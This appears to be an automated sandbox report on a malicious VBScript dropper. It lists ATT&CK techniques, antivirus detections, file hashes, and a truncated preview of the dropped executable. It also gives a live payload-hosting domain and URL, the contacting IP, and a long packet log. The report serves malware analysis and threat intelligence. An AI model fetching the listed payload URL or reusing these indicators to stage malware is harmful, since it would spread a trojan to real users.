Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	121 Scripting	Valid Accounts	1 Native API	121 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Exploitation for Client Execution	1 DLL Side-Loading	311 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	12 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Install Root Certificate	NTDS	2 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	41 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	311 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\temp_executable.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\temp_executable.exe	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
transfer.adttemp.com.br	5%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://crl.entrust.net/server1.crl0	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://secure.comodo.com/CPS0	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	Virustotal		Browse
https://transfer.adttemp.com.br	4%	Virustotal		Browse
http://transfer.adttemp.com.br	5%	Virustotal		Browse
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
transfer.adttemp.com.br	104.196.109.209	true	false	5%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://transfer.adttemp.com.br/hUkry/sirdeeeeee.txt	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://transfer.adttemp.com.br	temp_executable.exe, 00000002.00000002.371150308.0000000002794000.00000004.00000800.00020000.00000000.sdmp	true	5%, Virustotal, Browse	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://crl.entrust.net/server1.crl0	temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.entrust.net03	temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://transfer.adttemp.com.br	temp_executable.exe, 00000002.00000002.371150308.0000000002777000.00000004.00000800.00020000.00000000.sdmp	true	4%, Virustotal, Browse	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.diginotar.nl/cps/pkioverheid0	temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://transfer.adttemp.com.br/hUkry/sirdeeeeee.txtX~	temp_executable.exe, 00000002.00000002.371150308.0000000002777000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://ocsp.entrust.net0D	temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	temp_executable.exe, 00000002.00000002.371150308.0000000002777000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://transfer.adttemp.com.brX	temp_executable.exe, 00000002.00000002.371150308.0000000002794000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://crl.entrust.net/2048ca.crl0	temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.196.109.209	transfer.adttemp.com.br	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1530695
Start date and time:	2024-10-10 12:21:56 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	KjFT0qPTo4.vbs renamed because original name is a hash value
Original Sample Name:	437d16ac6fb62c138841e2ddb216dca0.vbs
Detection:	MAL
Classification:	mal100.troj.expl.evad.winVBS@5/1@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 21 Number of non-executed functions: 46
Cookbook Comments:	Found application associated with file extension: .vbs Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
06:22:51	API Interceptor	42x Sleep call for process: wscript.exe modified
06:22:53	API Interceptor	16x Sleep call for process: temp_executable.exe modified
06:23:34	API Interceptor	3x Sleep call for process: RegAsm.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
7dcce5b76c8b17472d024758970a406b	Quotation_398893.xlam.xlsx	Get hash	malicious	Unknown	Browse	104.196.109.209
	Documentosrs.ppam	Get hash	malicious	RevengeRAT	Browse	104.196.109.209
	PO-95958694495545.xls	Get hash	malicious	Remcos	Browse	104.196.109.209
	COT139562833.ATMetorlogya.xls	Get hash	malicious	Unknown	Browse	104.196.109.209
	Ordin de plat#U0103.docx.doc	Get hash	malicious	Unknown	Browse	104.196.109.209
	COT139562833.ATMetorlogya.xls	Get hash	malicious	Unknown	Browse	104.196.109.209
	PAYMENT APPLICATION.xls	Get hash	malicious	Unknown	Browse	104.196.109.209
	yYk4nXhHaA.doc	Get hash	malicious	Unknown	Browse	104.196.109.209
	Maersk BL, IN & PL.xls	Get hash	malicious	Remcos	Browse	104.196.109.209
	PO20241008.xls	Get hash	malicious	Unknown	Browse	104.196.109.209

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	5.975176572454892
Encrypted:	false
SSDEEP:	1536:8lE1kIo9cMtk/KI1t4uvPRMydDBg5sV+opzh:8lE1po9cMtsKI1t4uvPRMydDaNqN
MD5:	12E3B467C52A663A7B6F61AF61B63A11
SHA1:	6336F4CA9EC8105A0A3E32EDE0F2AAAE4DCAA7D7
SHA-256:	4B9B842F44FA8925E7CA3608DB8ABA660C02E3E1162DAAF458DD4D8021C04B50
SHA-512:	06FF931A16B55D792DF380B0174077E8D7DD324D062A34D4E13CE57F2F92C50CCBECC62CAE87598D2D11689C0223E4496241B476826EF7EAF5714EBE44AD12DB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................................,... ...@....@.. ....................................`..................................+..K....`...............................+............................................... ............... ..H............text...4.... ...................... ..`.sdata.......@......................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with very long lines (65451), with CRLF line terminators
Entropy (8bit):	4.433021692985713
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	KjFT0qPTo4.vbs
File size:	139'132 bytes
MD5:	437d16ac6fb62c138841e2ddb216dca0
SHA1:	0c74d149fbd1f4f1a20ba1f962564d02a88d184f
SHA256:	2b18564d817f6070f7cdb7f29dc8ba06a96772c7ce0ea72e74c944b089bf7df4
SHA512:	4dc2a180b770cf82c84d93cf649b530af33681d4f7d9c727aca6c44c1547a0dc078c6439a7980f1a726a874f1618aacb6d85b80d00e87c4caff6fd4e87cedccb
SSDEEP:	1536:6gda9TX8Jsk6YRN9qJgcs61wwmpxR8IFVU7H7HL830IkmdhJ6N40QO8BRC1bqbuy:gzYVx161wwXHuuIq1rsuG/fN
TLSH:	B5D37363DF069E1441970E7C8B065727BC6C85B8B3F9EED8E6E6480148F9726606B7CC
File Content Preview:	' Main Script Logic for Processing Base64 Data....Option Explicit....Dim base64Data..base64Data = "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@

File Icon


Icon Hash:	68d69b8f86ab9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 10, 2024 12:22:54.829889059 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:54.829976082 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:54.830053091 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:54.838200092 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:54.838277102 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.461716890 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.461935997 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.468152046 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.468206882 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.468703985 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.593528032 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.635441065 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.707839012 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.708163023 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.708173037 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.708211899 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.708337069 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.708403111 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.708483934 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.726053953 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.726068974 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.726100922 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.726125002 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.726186037 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.796356916 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.796555996 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.796576977 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.796638966 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.796638966 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.796705961 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.797261000 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.797312021 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.797466993 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.797532082 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.797605991 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.797687054 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.798615932 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.798665047 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.798680067 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.798701048 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.798758984 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.814595938 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.814646006 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.814769983 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.814836025 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.814913034 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.884644032 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.884763956 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.884792089 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.884819984 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.885020018 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.885303020 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.885380983 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.886868000 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.886924982 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.887279987 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.887351990 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.887583971 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.887644053 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.887764931 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.887835979 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.888137102 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.888194084 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.888775110 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.888845921 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.888906002 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.888966084 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.889523983 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.889588118 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.889653921 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.889714003 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.889801025 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.889863014 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.891766071 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.891935110 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.910001993 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.910145998 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.910221100 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.910221100 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.910284042 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.973754883 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.973854065 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.973915100 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.973953962 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.974024057 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.974040031 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.974086046 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.974143982 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.974157095 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.974275112 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.974330902 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.974344015 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.974396944 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.974455118 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.974467993 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.974859953 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.974919081 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.974932909 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.975003004 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.975059032 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.975074053 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.975466967 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.975532055 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.975544930 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.975621939 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.975676060 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.975689888 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.976140022 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.976198912 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.976212025 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.976289034 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.976356030 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.976368904 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.976936102 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.977000952 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.977014065 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.977269888 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.977327108 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.977339983 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.977411985 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.977475882 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.977488041 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.977552891 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.977612019 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.977626085 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.978255987 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.978317976 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.978331089 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.978401899 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.978458881 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.978471994 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.978986025 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.979042053 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.979052067 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.979067087 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.979103088 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.979682922 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.979737997 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.979746103 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.979758024 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.979796886 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.979810953 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.979860067 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.980600119 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.980654955 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.991270065 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.991350889 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.991626024 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.991683006 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.991904020 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.991969109 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.992408991 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.992471933 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:55.992527962 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:55.992594957 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.061491966 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.061638117 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.061692953 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.061755896 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.061815023 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.061825037 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.061847925 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.061901093 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.062093019 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.062199116 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.062217951 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.062526941 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.062597990 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.062613964 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.062649012 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.062700987 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.062716007 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.062963963 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.063034058 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.063045979 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.063291073 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.063345909 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.063359022 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.063512087 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.063571930 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.063587904 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.063620090 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.063673019 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.063694000 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.064377069 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.064439058 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.064459085 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.064965010 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.065027952 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.065042019 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.065886021 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.065951109 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.065964937 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.066715956 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.066783905 CEST	49163	443	192.168.2.22	104.196.109.209
